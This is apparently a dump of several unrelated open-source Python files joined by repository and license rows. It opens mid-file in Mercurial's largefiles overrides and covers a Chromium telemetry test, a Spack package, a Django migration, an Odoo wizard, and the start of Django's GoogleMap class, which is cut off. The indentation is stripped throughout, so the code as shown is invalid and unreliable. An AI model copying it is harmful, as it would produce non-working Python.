if (m == "g" and splitstandin is not None and
splitstandin in p1 and f in p2):
# Case 1: normal file in the working copy, largefile in
# the second parent
lfile = splitstandin
standin = f
msg = _('%s has been turned into a largefile\n'
'use (l)argefile or keep as (n)ormal file?') % lfile
if repo.ui.promptchoice(msg, choices, 0) == 0:
processed.append((lfile, "r", None, msg))
processed.append((standin, "g", (p2.flags(standin),), msg))
else:
processed.append((standin, "r", None, msg))
elif m == "g" and lfutil.standin(f) in p1 and f in p2:
# Case 2: largefile in the working copy, normal file in
# the second parent
standin = lfutil.standin(f)
lfile = f
msg = _('%s has been turned into a normal file\n'
'keep as (l)argefile or use (n)ormal file?') % lfile
if repo.ui.promptchoice(msg, choices, 0) == 0:
processed.append((lfile, "r", None, msg))
else:
processed.append((standin, "r", None, msg))
processed.append((lfile, "g", (p2.flags(lfile),), msg))
else:
processed.append(action)
return processed
# Override filemerge to prompt the user about how they wish to merge
# largefiles. This will handle identical edits, and copy/rename +
# edit without prompting the user.
def overridefilemerge(origfn, repo, mynode, orig, fcd, fco, fca):
# Use better variable names here. Because this is a wrapper we cannot
# change the variable names in the function declaration.
fcdest, fcother, fcancestor = fcd, fco, fca
if not lfutil.isstandin(orig):
return origfn(repo, mynode, orig, fcdest, fcother, fcancestor)
else:
if not fcother.cmp(fcdest): # files identical?
return None
# backwards, use working dir parent as ancestor
if fcancestor == fcother:
fcancestor = fcdest.parents()[0]
if orig != fcother.path():
repo.ui.status(_('merging %s and %s to %s\n')
% (lfutil.splitstandin(orig),
lfutil.splitstandin(fcother.path()),
lfutil.splitstandin(fcdest.path())))
else:
repo.ui.status(_('merging %s\n')
% lfutil.splitstandin(fcdest.path()))
if fcancestor.path() != fcother.path() and fcother.data() == \
fcancestor.data():
return 0
if fcancestor.path() != fcdest.path() and fcdest.data() == \
fcancestor.data():
repo.wwrite(fcdest.path(), fcother.data(), fcother.flags())
return 0
if repo.ui.promptchoice(_('largefile %s has a merge conflict\n'
'keep (l)ocal or take (o)ther?') %
lfutil.splitstandin(orig),
(_('&Local'), _('&Other')), 0) == 0:
return 0
else:
repo.wwrite(fcdest.path(), fcother.data(), fcother.flags())
return 0
# Copy first changes the matchers to match standins instead of
# largefiles. Then it overrides util.copyfile in that function it
# checks if the destination largefile already exists. It also keeps a
# list of copied files so that the largefiles can be copied and the
# dirstate updated.
def overridecopy(orig, ui, repo, pats, opts, rename=False):
# doesn't remove largefile on rename
if len(pats) < 2:
# this isn't legal, let the original function deal with it
return orig(ui, repo, pats, opts, rename)
def makestandin(relpath):
path = scmutil.canonpath(repo.root, repo.getcwd(), relpath)
return os.path.join(repo.wjoin(lfutil.standin(path)))
fullpats = scmutil.expandpats(pats)
dest = fullpats[-1]
if os.path.isdir(dest):
if not os.path.isdir(makestandin(dest)):
os.makedirs(makestandin(dest))
# This could copy both lfiles and normal files in one command,
# but we don't want to do that. First replace their matcher to
# only match normal files and run it, then replace it to just
# match largefiles and run it again.
nonormalfiles = False
nolfiles = False
try:
try:
installnormalfilesmatchfn(repo[None].manifest())
result = orig(ui, repo, pats, opts, rename)
except util.Abort, e:
if str(e) != _('no files to copy'):
raise e
else:
nonormalfiles = True
result = 0
finally:
restorematchfn()
# The first rename can cause our current working directory to be removed.
# In that case there is nothing left to copy/rename so just quit.
try:
repo.getcwd()
except OSError:
return result
try:
try:
# When we call orig below it creates the standins but we don't add
# them to the dir state until later so lock during that time.
wlock = repo.wlock()
manifest = repo[None].manifest()
oldmatch = None # for the closure
def overridematch(ctx, pats=[], opts={}, globbed=False,
default='relpath'):
newpats = []
# The patterns were previously mangled to add the standin
# directory; we need to remove that now
for pat in pats:
if match_.patkind(pat) is None and lfutil.shortname in pat:
newpats.append(pat.replace(lfutil.shortname, ''))
else:
newpats.append(pat)
match = oldmatch(ctx, newpats, opts, globbed, default)
m = copy.copy(match)
lfile = lambda f: lfutil.standin(f) in manifest
m._files = [lfutil.standin(f) for f in m._files if lfile(f)]
m._fmap = set(m._files)
m._always = False
origmatchfn = m.matchfn
m.matchfn = lambda f: (lfutil.isstandin(f) and
(f in manifest) and
origmatchfn(lfutil.splitstandin(f)) or
None)
return m
oldmatch = installmatchfn(overridematch)
listpats = []
for pat in pats:
if match_.patkind(pat) is not None:
listpats.append(pat)
else:
listpats.append(makestandin(pat))
try:
origcopyfile = util.copyfile
copiedfiles = []
def overridecopyfile(src, dest):
if (lfutil.shortname in src and
dest.startswith(repo.wjoin(lfutil.shortname))):
destlfile = dest.replace(lfutil.shortname, '')
if not opts['force'] and os.path.exists(destlfile):
raise IOError('',
_('destination largefile already exists'))
copiedfiles.append((src, dest))
origcopyfile(src, dest)
util.copyfile = overridecopyfile
result += orig(ui, repo, listpats, opts, rename)
finally:
util.copyfile = origcopyfile
lfdirstate = lfutil.openlfdirstate(ui, repo)
for (src, dest) in copiedfiles:
if (lfutil.shortname in src and
dest.startswith(repo.wjoin(lfutil.shortname))):
srclfile = src.replace(repo.wjoin(lfutil.standin('')), '')
destlfile = dest.replace(repo.wjoin(lfutil.standin('')), '')
destlfiledir = os.path.dirname(repo.wjoin(destlfile)) or '.'
if not os.path.isdir(destlfiledir):
os.makedirs(destlfiledir)
if rename:
os.rename(repo.wjoin(srclfile), repo.wjoin(destlfile))
lfdirstate.remove(srclfile)
else:
util.copyfile(repo.wjoin(srclfile),
repo.wjoin(destlfile))
lfdirstate.add(destlfile)
lfdirstate.write()
except util.Abort, e:
if str(e) != _('no files to copy'):
raise e
else:
nolfiles = True
finally:
restorematchfn()
wlock.release()
if nolfiles and nonormalfiles:
raise util.Abort(_('no files to copy'))
return result
# When the user calls revert, we have to be careful to not revert any
# changes to other largefiles accidentally. This means we have to keep
# track of the largefiles that are being reverted so we only pull down
# the necessary largefiles.
#
# Standins are only updated (to match the hash of largefiles) before
# commits. Update the standins then run the original revert, changing
# the matcher to hit standins instead of largefiles. Based on the
# resulting standins update the largefiles. Then return the standins
# to their proper state
def overriderevert(orig, ui, repo, *pats, **opts):
# Because we put the standins in a bad state (by updating them)
# and then return them to a correct state we need to lock to
# prevent others from changing them in their incorrect state.
wlock = repo.wlock()
try:
lfdirstate = lfutil.openlfdirstate(ui, repo)
(modified, added, removed, missing, unknown, ignored, clean) = \
lfutil.lfdirstatestatus(lfdirstate, repo, repo['.'].rev())
lfdirstate.write()
for lfile in modified:
lfutil.updatestandin(repo, lfutil.standin(lfile))
for lfile in missing:
if (os.path.exists(repo.wjoin(lfutil.standin(lfile)))):
os.unlink(repo.wjoin(lfutil.standin(lfile)))
try:
ctx = scmutil.revsingle(repo, opts.get('rev'))
oldmatch = None # for the closure
def overridematch(ctx, pats=[], opts={}, globbed=False,
default='relpath'):
match = oldmatch(ctx, pats, opts, globbed, default)
m = copy.copy(match)
def tostandin(f):
if lfutil.standin(f) in ctx:
return lfutil.standin(f)
elif lfutil.standin(f) in repo[None]:
return None
return f
m._files = [tostandin(f) for f in m._files]
m._files = [f for f in m._files if f is not None]
m._fmap = set(m._files)
m._always = False
origmatchfn = m.matchfn
def matchfn(f):
if lfutil.isstandin(f):
# We need to keep track of what largefiles are being
# matched so we know which ones to update later --
# otherwise we accidentally revert changes to other
# largefiles. This is repo-specific, so duckpunch the
# repo object to keep the list of largefiles for us
# later.
if origmatchfn(lfutil.splitstandin(f)) and \
(f in repo[None] or f in ctx):
lfileslist = getattr(repo, '_lfilestoupdate', [])
lfileslist.append(lfutil.splitstandin(f))
repo._lfilestoupdate = lfileslist
return True
else:
return False
return origmatchfn(f)
m.matchfn = matchfn
return m
oldmatch = installmatchfn(overridematch)
scmutil.match
matches = overridematch(repo[None], pats, opts)
orig(ui, repo, *pats, **opts)
finally:
restorematchfn()
lfileslist = getattr(repo, '_lfilestoupdate', [])
lfcommands.updatelfiles(ui, repo, filelist=lfileslist,
printmessage=False)
# empty out the largefiles list so we start fresh next time
repo._lfilestoupdate = []
for lfile in modified:
if lfile in lfileslist:
if os.path.exists(repo.wjoin(lfutil.standin(lfile))) and lfile\
in repo['.']:
lfutil.writestandin(repo, lfutil.standin(lfile),
repo['.'][lfile].data().strip(),
'x' in repo['.'][lfile].flags())
lfdirstate = lfutil.openlfdirstate(ui, repo)
for lfile in added:
standin = lfutil.standin(lfile)
if standin not in ctx and (standin in matches or opts.get('all')):
if lfile in lfdirstate:
lfdirstate.drop(lfile)
util.unlinkpath(repo.wjoin(standin))
lfdirstate.write()
finally:
wlock.release()
def hgupdaterepo(orig, repo, node, overwrite):
if not overwrite:
# Only call updatelfiles on the standins that have changed to save time
oldstandins = lfutil.getstandinsstate(repo)
result = orig(repo, node, overwrite)
filelist = None
if not overwrite:
newstandins = lfutil.getstandinsstate(repo)
filelist = lfutil.getlfilestoupdate(oldstandins, newstandins)
lfcommands.updatelfiles(repo.ui, repo, filelist=filelist)
return result
def hgmerge(orig, repo, node, force=None, remind=True):
result = orig(repo, node, force, remind)
lfcommands.updatelfiles(repo.ui, repo)
return result
# When we rebase a repository with remotely changed largefiles, we need to
# take some extra care so that the largefiles are correctly updated in the
# working copy
def overridepull(orig, ui, repo, source=None, **opts):
revsprepull = len(repo)
if not source:
source = 'default'
repo.lfpullsource = source
if opts.get('rebase', False):
repo._isrebasing = True
try:
if opts.get('update'):
del opts['update']
ui.debug('--update and --rebase are not compatible, ignoring '
'the update flag\n')
del opts['rebase']
cmdutil.bailifchanged(repo)
origpostincoming = commands.postincoming
def _dummy(*args, **kwargs):
pass
commands.postincoming = _dummy
try:
result = commands.pull(ui, repo, source, **opts)
finally:
commands.postincoming = origpostincoming
revspostpull = len(repo)
if revspostpull > revsprepull:
result = result or rebase.rebase(ui, repo)
finally:
repo._isrebasing = False
else:
result = orig(ui, repo, source, **opts)
revspostpull = len(repo)
lfrevs = opts.get('lfrev', [])
if opts.get('all_largefiles'):
lfrevs.append('pulled()')
if lfrevs and revspostpull > revsprepull:
numcached = 0
repo.firstpulled = revsprepull # for pulled() revset expression
try:
for rev in scmutil.revrange(repo, lfrevs):
ui.note(_('pulling largefiles for revision %s\n') % rev)
(cached, missing) = lfcommands.cachelfiles(ui, repo, rev)
numcached += len(cached)
finally:
del repo.firstpulled
ui.status(_("%d largefiles cached\n") % numcached)
return result
def pulledrevsetsymbol(repo, subset, x):
"""``pulled()``
Changesets that just has been pulled.
Only available with largefiles from pull --lfrev expressions.
.. container:: verbose
Some examples:
- pull largefiles for all new changesets::
hg pull -lfrev "pulled()"
- pull largefiles for all new branch heads::
hg pull -lfrev "head(pulled()) and not closed()"
"""
try:
firstpulled = repo.firstpulled
except AttributeError:
raise util.Abort(_("pulled() only available in --lfrev"))
return [r for r in subset if r >= firstpulled]
def overrideclone(orig, ui, source, dest=None, **opts):
d = dest
if d is None:
d = hg.defaultdest(source)
if opts.get('all_largefiles') and not hg.islocal(d):
raise util.Abort(_(
'--all-largefiles is incompatible with non-local destination %s' %
d))
return orig(ui, source, dest, **opts)
def hgclone(orig, ui, opts, *args, **kwargs):
result = orig(ui, opts, *args, **kwargs)
if result is not None:
sourcerepo, destrepo = result
repo = destrepo.local()
# Caching is implicitly limited to 'rev' option, since the dest repo was
# truncated at that point. The user may expect a download count with
# this option, so attempt whether or not this is a largefile repo.
if opts.get('all_largefiles'):
success, missing = lfcommands.downloadlfiles(ui, repo, None)
if missing != 0:
return None
return result
def overriderebase(orig, ui, repo, **opts):
repo._isrebasing = True
try:
return orig(ui, repo, **opts)
finally:
repo._isrebasing = False
def overridearchive(orig, repo, dest, node, kind, decode=True, matchfn=None,
prefix=None, mtime=None, subrepos=None):
# No need to lock because we are only reading history and
# largefile caches, neither of which are modified.
lfcommands.cachelfiles(repo.ui, repo, node)
if kind not in archival.archivers:
raise util.Abort(_("unknown archive type '%s'") % kind)
ctx = repo[node]
if kind == 'files':
if prefix:
raise util.Abort(
_('cannot give prefix when archiving to files'))
else:
prefix = archival.tidyprefix(dest, kind, prefix)
def write(name, mode, islink, getdata):
if matchfn and not matchfn(name):
return
data = getdata()
if decode:
data = repo.wwritedata(name, data)
archiver.addfile(prefix + name, mode, islink, data)
archiver = archival.archivers[kind](dest, mtime or ctx.date()[0])
if repo.ui.configbool("ui", "archivemeta", True):
def metadata():
base = 'repo: %s\nnode: %s\nbranch: %s\n' % (
hex(repo.changelog.node(0)), hex(node), ctx.branch())
tags = ''.join('tag: %s\n' % t for t in ctx.tags()
if repo.tagtype(t) == 'global')
if not tags:
repo.ui.pushbuffer()
opts = {'template': '{latesttag}\n{latesttagdistance}',
'style': '', 'patch': None, 'git': None}
cmdutil.show_changeset(repo.ui, repo, opts).show(ctx)
ltags, dist = repo.ui.popbuffer().split('\n')
tags = ''.join('latesttag: %s\n' % t for t in ltags.split(':'))
tags += 'latesttagdistance: %s\n' % dist
return base + tags
write('.hg_archival.txt', 0644, False, metadata)
for f in ctx:
ff = ctx.flags(f)
getdata = ctx[f].data
if lfutil.isstandin(f):
path = lfutil.findfile(repo, getdata().strip())
if path is None:
raise util.Abort(
_('largefile %s not found in repo store or system cache')
% lfutil.splitstandin(f))
f = lfutil.splitstandin(f)
def getdatafn():
fd = None
try:
fd = open(path, 'rb')
return fd.read()
finally:
if fd:
fd.close()
getdata = getdatafn
write(f, 'x' in ff and 0755 or 0644, 'l' in ff, getdata)
if subrepos:
for subpath in sorted(ctx.substate):
sub = ctx.sub(subpath)
submatch = match_.narrowmatcher(subpath, matchfn)
sub.archive(repo.ui, archiver, prefix, submatch)
archiver.done()
def hgsubrepoarchive(orig, repo, ui, archiver, prefix, match=None):
repo._get(repo._state + ('hg',))
rev = repo._state[1]
ctx = repo._repo[rev]
lfcommands.cachelfiles(ui, repo._repo, ctx.node())
def write(name, mode, islink, getdata):
# At this point, the standin has been replaced with the largefile name,
# so the normal matcher works here without the lfutil variants.
if match and not match(f):
return
data = getdata()
archiver.addfile(prefix + repo._path + '/' + name, mode, islink, data)
for f in ctx:
ff = ctx.flags(f)
getdata = ctx[f].data
if lfutil.isstandin(f):
path = lfutil.findfile(repo._repo, getdata().strip())
if path is None:
raise util.Abort(
_('largefile %s not found in repo store or system cache')
% lfutil.splitstandin(f))
f = lfutil.splitstandin(f)
def getdatafn():
fd = None
try:
fd = open(os.path.join(prefix, path), 'rb')
return fd.read()
finally:
if fd:
fd.close()
getdata = getdatafn
write(f, 'x' in ff and 0755 or 0644, 'l' in ff, getdata)
for subpath in sorted(ctx.substate):
sub = ctx.sub(subpath)
submatch = match_.narrowmatcher(subpath, match)
sub.archive(ui, archiver, os.path.join(prefix, repo._path) + '/',
submatch)
# If a largefile is modified, the change is not reflected in its
# standin until a commit. cmdutil.bailifchanged() raises an exception
# if the repo has uncommitted changes. Wrap it to also check if
# largefiles were changed. This is used by bisect and backout.
def overridebailifchanged(orig, repo):
orig(repo)
repo.lfstatus = True
modified, added, removed, deleted = repo.status()[:4]
repo.lfstatus = False
if modified or added or removed or deleted:
raise util.Abort(_('outstanding uncommitted changes'))
# Fetch doesn't use cmdutil.bailifchanged so override it to add the check
def overridefetch(orig, ui, repo, *pats, **opts):
repo.lfstatus = True
modified, added, removed, deleted = repo.status()[:4]
repo.lfstatus = False
if modified or added or removed or deleted:
raise util.Abort(_('outstanding uncommitted changes'))
return orig(ui, repo, *pats, **opts)
def overrideforget(orig, ui, repo, *pats, **opts):
installnormalfilesmatchfn(repo[None].manifest())
result = orig(ui, repo, *pats, **opts)
restorematchfn()
m = scmutil.match(repo[None], pats, opts)
try:
repo.lfstatus = True
s = repo.status(match=m, clean=True)
finally:
repo.lfstatus = False
forget = sorted(s[0] + s[1] + s[3] + s[6])
forget = [f for f in forget if lfutil.standin(f) in repo[None].manifest()]
for f in forget:
if lfutil.standin(f) not in repo.dirstate and not \
os.path.isdir(m.rel(lfutil.standin(f))):
ui.warn(_('not removing %s: file is already untracked\n')
% m.rel(f))
result = 1
for f in forget:
if ui.verbose or not m.exact(f):
ui.status(_('removing %s\n') % m.rel(f))
# Need to lock because standin files are deleted then removed from the
# repository and we could race in-between.
wlock = repo.wlock()
try:
lfdirstate = lfutil.openlfdirstate(ui, repo)
for f in forget:
if lfdirstate[f] == 'a':
lfdirstate.drop(f)
else:
lfdirstate.remove(f)
lfdirstate.write()
standins = [lfutil.standin(f) for f in forget]
for f in standins:
util.unlinkpath(repo.wjoin(f), ignoremissing=True)
repo[None].forget(standins)
finally:
wlock.release()
return result
def getoutgoinglfiles(ui, repo, dest=None, **opts):
dest = ui.expandpath(dest or 'default-push', dest or 'default')
dest, branches = hg.parseurl(dest, opts.get('branch'))
revs, checkout = hg.addbranchrevs(repo, repo, branches, opts.get('rev'))
if revs:
revs = [repo.lookup(rev) for rev in scmutil.revrange(repo, revs)]
try:
remote = hg.peer(repo, opts, dest)
except error.RepoError:
return None
outgoing = discovery.findcommonoutgoing(repo, remote.peer(), force=False)
if not outgoing.missing:
return outgoing.missing
o = repo.changelog.nodesbetween(outgoing.missing, revs)[0]
if opts.get('newest_first'):
o.reverse()
toupload = set()
for n in o:
parents = [p for p in repo.changelog.parents(n) if p != node.nullid]
ctx = repo[n]
files = set(ctx.files())
if len(parents) == 2:
mc = ctx.manifest()
mp1 = ctx.parents()[0].manifest()
mp2 = ctx.parents()[1].manifest()
for f in mp1:
if f not in mc:
files.add(f)
for f in mp2:
if f not in mc:
files.add(f)
for f in mc:
if mc[f] != mp1.get(f, None) or mc[f] != mp2.get(f, None):
files.add(f)
toupload = toupload.union(
set([f for f in files if lfutil.isstandin(f) and f in ctx]))
return sorted(toupload)
def overrideoutgoing(orig, ui, repo, dest=None, **opts):
result = orig(ui, repo, dest, **opts)
if opts.pop('large', None):
toupload = getoutgoinglfiles(ui, repo, dest, **opts)
if toupload is None:
ui.status(_('largefiles: No remote repo\n'))
elif not toupload:
ui.status(_('largefiles: no files to upload\n'))
else:
ui.status(_('largefiles to upload:\n'))
for file in toupload:
ui.status(lfutil.splitstandin(file) + '\n')
ui.status('\n')
return result
def overridesummary(orig, ui, repo, *pats, **opts):
try:
repo.lfstatus = True
orig(ui, repo, *pats, **opts)
finally:
repo.lfstatus = False
if opts.pop('large', None):
toupload = getoutgoinglfiles(ui, repo, None, **opts)
if toupload is None:
# i18n: column positioning for "hg summary"
ui.status(_('largefiles: (no remote repo)\n'))
elif not toupload:
# i18n: column positioning for "hg summary"
ui.status(_('largefiles: (no files to upload)\n'))
else:
# i18n: column positioning for "hg summary"
ui.status(_('largefiles: %d to upload\n') % len(toupload))
def scmutiladdremove(orig, repo, pats=[], opts={}, dry_run=None,
similarity=None):
if not lfutil.islfilesrepo(repo):
return orig(repo, pats, opts, dry_run, similarity)
# Get the list of missing largefiles so we can remove them
lfdirstate = lfutil.openlfdirstate(repo.ui, repo)
s = lfdirstate.status(match_.always(repo.root, repo.getcwd()), [], False,
False, False)
(unsure, modified, added, removed, missing, unknown, ignored, clean) = s
# Call into the normal remove code, but the removing of the standin, we want
# to have handled by original addremove. Monkey patching here makes sure
# we don't remove the standin in the largefiles code, preventing a very
# confused state later.
if missing:
m = [repo.wjoin(f) for f in missing]
repo._isaddremove = True
removelargefiles(repo.ui, repo, *m, **opts)
repo._isaddremove = False
# Call into the normal add code, and any files that *should* be added as
# largefiles will be
addlargefiles(repo.ui, repo, *pats, **opts)
# Now that we've handled largefiles, hand off to the original addremove
# function to take care of the rest. Make sure it doesn't do anything with
# largefiles by installing a matcher that will ignore them.
installnormalfilesmatchfn(repo[None].manifest())
result = orig(repo, pats, opts, dry_run, similarity)
restorematchfn()
return result
# Calling purge with --all will cause the largefiles to be deleted.
# Override repo.status to prevent this from happening.
def overridepurge(orig, ui, repo, *dirs, **opts):
# XXX large file status is buggy when used on repo proxy.
# XXX this needs to be investigate.
repo = repo.unfiltered()
oldstatus = repo.status
def overridestatus(node1='.', node2=None, match=None, ignored=False,
clean=False, unknown=False, listsubrepos=False):
r = oldstatus(node1, node2, match, ignored, clean, unknown,
listsubrepos)
lfdirstate = lfutil.openlfdirstate(ui, repo)
modified, added, removed, deleted, unknown, ignored, clean = r
unknown = [f for f in unknown if lfdirstate[f] == '?']
ignored = [f for f in ignored if lfdirstate[f] == '?']
return modified, added, removed, deleted, unknown, ignored, clean
repo.status = overridestatus
orig(ui, repo, *dirs, **opts)
repo.status = oldstatus
def overriderollback(orig, ui, repo, **opts):
result = orig(ui, repo, **opts)
merge.update(repo, node=None, branchmerge=False, force=True,
partial=lfutil.isstandin)
wlock = repo.wlock()
try:
lfdirstate = lfutil.openlfdirstate(ui, repo)
lfiles = lfutil.listlfiles(repo)
oldlfiles = lfutil.listlfiles(repo, repo[None].parents()[0].rev())
for file in lfiles:
if file in oldlfiles:
lfdirstate.normallookup(file)
else:
lfdirstate.add(file)
lfdirstate.write()
finally:
wlock.release()
return result
def overridetransplant(orig, ui, repo, *revs, **opts):
try:
oldstandins = lfutil.getstandinsstate(repo)
repo._istransplanting = True
result = orig(ui, repo, *revs, **opts)
newstandins = lfutil.getstandinsstate(repo)
filelist = lfutil.getlfilestoupdate(oldstandins, newstandins)
lfcommands.updatelfiles(repo.ui, repo, filelist=filelist,
printmessage=True)
finally:
repo._istransplanting = False
return result
def overridecat(orig, ui, repo, file1, *pats, **opts):
ctx = scmutil.revsingle(repo, opts.get('rev'))
err = 1
notbad = set()
m = scmutil.match(ctx, (file1,) + pats, opts)
origmatchfn = m.matchfn
def lfmatchfn(f):
lf = lfutil.splitstandin(f)
if lf is None:
return origmatchfn(f)
notbad.add(lf)
return origmatchfn(lf)
m.matchfn = lfmatchfn
origbadfn = m.bad
def lfbadfn(f, msg):
if not f in notbad:
return origbadfn(f, msg)
m.bad = lfbadfn
for f in ctx.walk(m):
fp = cmdutil.makefileobj(repo, opts.get('output'), ctx.node(),
pathname=f)
lf = lfutil.splitstandin(f)
if lf is None:
# duplicating unreachable code from commands.cat
data = ctx[f].data()
if opts.get('decode'):
data = repo.wwritedata(f, data)
fp.write(data)
else:
hash = lfutil.readstandin(repo, lf, ctx.rev())
if not lfutil.inusercache(repo.ui, hash):
store = basestore._openstore(repo)
success, missing = store.get([(lf, hash)])
if len(success) != 1:
raise util.Abort(
_('largefile %s is not in cache and could not be '
'downloaded') % lf)
path = lfutil.usercachepath(repo.ui, hash)
fpin = open(path, "rb")
for chunk in util.filechunkiter(fpin, 128 * 1024):
fp.write(chunk)
fpin.close()
fp.close()
err = 0
return err
def mercurialsinkbefore(orig, sink):
sink.repo._isconverting = True
orig(sink)
def mercurialsinkafter(orig, sink):
sink.repo._isconverting = False
orig(sink)
| apache-2.0 |
PeterWangIntel/chromium-crosswalk | tools/telemetry/telemetry/telemetry_dependencies_unittest.py | 5 | 2039 | # Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import os
import unittest
from telemetry.util import path
from telemetry.util import find_dependencies
_TELEMETRY_DEPS_PATH = os.path.join(
path.GetTelemetryDir(), 'telemetry', 'TELEMETRY_DEPS')
def _GetCurrentTelemetryDependencies():
parser = find_dependencies.FindDependenciesCommand.CreateParser()
find_dependencies.FindDependenciesCommand.AddCommandLineArgs(parser, None)
options, args = parser.parse_args([''])
options.positional_args = args
return find_dependencies.FindDependencies([], options=options)
def _GetRestrictedTelemetryDeps():
with open(_TELEMETRY_DEPS_PATH, 'r') as f:
telemetry_deps = json.load(f)
# Normalize paths in telemetry_deps since TELEMETRY_DEPS file only contain
# the relative path in chromium/src/.
def NormalizePath(p):
p = p.replace('/', os.path.sep)
return os.path.realpath(os.path.join(path.GetChromiumSrcDir(), p))
telemetry_deps['file_deps'] = [
NormalizePath(p) for p in telemetry_deps['file_deps']]
telemetry_deps['directory_deps'] = [
NormalizePath(p) for p in telemetry_deps['directory_deps']]
return telemetry_deps
class TelemetryDependenciesTest(unittest.TestCase):
def testNoNewTelemetryDependencies(self):
telemetry_deps = _GetRestrictedTelemetryDeps()
current_dependencies = _GetCurrentTelemetryDependencies()
extra_dep_paths = []
for dep_path in current_dependencies:
if not (dep_path in telemetry_deps['file_deps'] or
any(path.IsSubpath(dep_path, d)
for d in telemetry_deps['directory_deps'])):
extra_dep_paths.append(dep_path)
if extra_dep_paths:
self.fail(
'Your patch adds new dependencies to telemetry. Please contact '
'aiolos@,dtu@, or nednguyen@ on how to proceed with this change. '
'Extra dependencies:\n%s' % '\n'.join(extra_dep_paths))
| bsd-3-clause |
rspavel/spack | var/spack/repos/builtin/packages/py-pyfftw/package.py | 5 | 1092 | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyPyfftw(PythonPackage):
"""A pythonic wrapper around FFTW, the FFT library,
presenting a unified interface for all the supported transforms."""
homepage = "http://hgomersall.github.com/pyFFTW"
url = "https://pypi.io/packages/source/p/pyFFTW/pyFFTW-0.10.4.tar.gz"
version('0.12.0', sha256='60988e823ca75808a26fd79d88dbae1de3699e72a293f812aa4534f8a0a58cb0')
version('0.11.1', sha256='05ea28dede4c3aaaf5c66f56eb0f71849d0d50f5bc0f53ca0ffa69534af14926')
version('0.10.4', sha256='739b436b7c0aeddf99a48749380260364d2dc027cf1d5f63dafb5f50068ede1a')
depends_on('fftw')
depends_on('py-setuptools', type='build')
depends_on('py-cython@0.29:0.999', type='build')
depends_on('py-numpy@1.6:', type=('build', 'run'), when='@:0.10.4')
depends_on('py-numpy@1.10:1.999', type=('build', 'run'), when='@0.11.0:')
| lgpl-2.1 |
ojii/gitstats.ep.io | src/stats/migrations/0001_initial.py | 1 | 1658 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Repository'
db.create_table('stats_repository', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=50)),
('slug', self.gf('django.db.models.fields.SlugField')(unique=True, max_length=50, db_index=True)),
('repourl', self.gf('django.db.models.fields.CharField')(unique=True, max_length=255)),
('updated', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
))
db.send_create_signal('stats', ['Repository'])
def backwards(self, orm):
# Deleting model 'Repository'
db.delete_table('stats_repository')
models = {
'stats.repository': {
'Meta': {'ordering': "['name']", 'object_name': 'Repository'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'}),
'repourl': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
}
}
complete_apps = ['stats']
| bsd-3-clause |
3dfxmadscientist/odoo_vi | addons/account/wizard/account_fiscalyear_close_state.py | 43 | 2504 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from openerp.tools.translate import _
class account_fiscalyear_close_state(osv.osv_memory):
"""
Closes Account Fiscalyear
"""
_name = "account.fiscalyear.close.state"
_description = "Fiscalyear Close state"
_columns = {
'fy_id': fields.many2one('account.fiscalyear', \
'Fiscal Year to Close', required=True, help="Select a fiscal year to close"),
}
def data_save(self, cr, uid, ids, context=None):
"""
This function close account fiscalyear
@param cr: the current row, from the database cursor,
@param uid: the current user’s ID for security checks,
@param ids: List of Account fiscalyear close state’s IDs
"""
for data in self.read(cr, uid, ids, context=context):
fy_id = data['fy_id'][0]
cr.execute('UPDATE account_journal_period ' \
'SET state = %s ' \
'WHERE period_id IN (SELECT id FROM account_period \
WHERE fiscalyear_id = %s)',
('done', fy_id))
cr.execute('UPDATE account_period SET state = %s ' \
'WHERE fiscalyear_id = %s', ('done', fy_id))
cr.execute('UPDATE account_fiscalyear ' \
'SET state = %s WHERE id = %s', ('done', fy_id))
return {'type': 'ir.actions.act_window_close'}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
ytjiang/django | django/contrib/gis/maps/google/gmap.py | 526 | 9223 | from __future__ import unicode_literals
from django.conf import settings
from django.contrib.gis.maps.google.overlays import (
GMarker, GPolygon, GPolyline,
)
from django.template.loader import render_to_string
from django.utils.html import format_html
from django.utils.safestring import mark_safe
from django.utils.six.moves import range
class GoogleMapException(Exception):
pass
# The default Google Maps URL (for the API javascript)
# TODO: Internationalize for Japan, UK, etc.
GOOGLE_MAPS_URL = 'http://maps.google.com/maps?file=api&v=%s&key='
class GoogleMap(object):
"A class for generating Google Maps JavaScript."
# String constants
onunload = mark_safe('onunload="GUnload()"') # Cleans up after Google Maps
vml_css = mark_safe('v\:* {behavior:url(#default#VML);}') # CSS for IE VML
xmlns = mark_safe('xmlns:v="urn:schemas-microsoft-com:vml"') # XML Namespace (for IE VML).
def __init__(self, key=None, api_url=None, version=None,
center=None, zoom=None, dom_id='map',
kml_urls=[], polylines=None, polygons=None, markers=None,
template='gis/google/google-map.js',
js_module='geodjango',
extra_context={}):
# The Google Maps API Key defined in the settings will be used
# if not passed in as a parameter. The use of an API key is
# _required_.
if not key:
try:
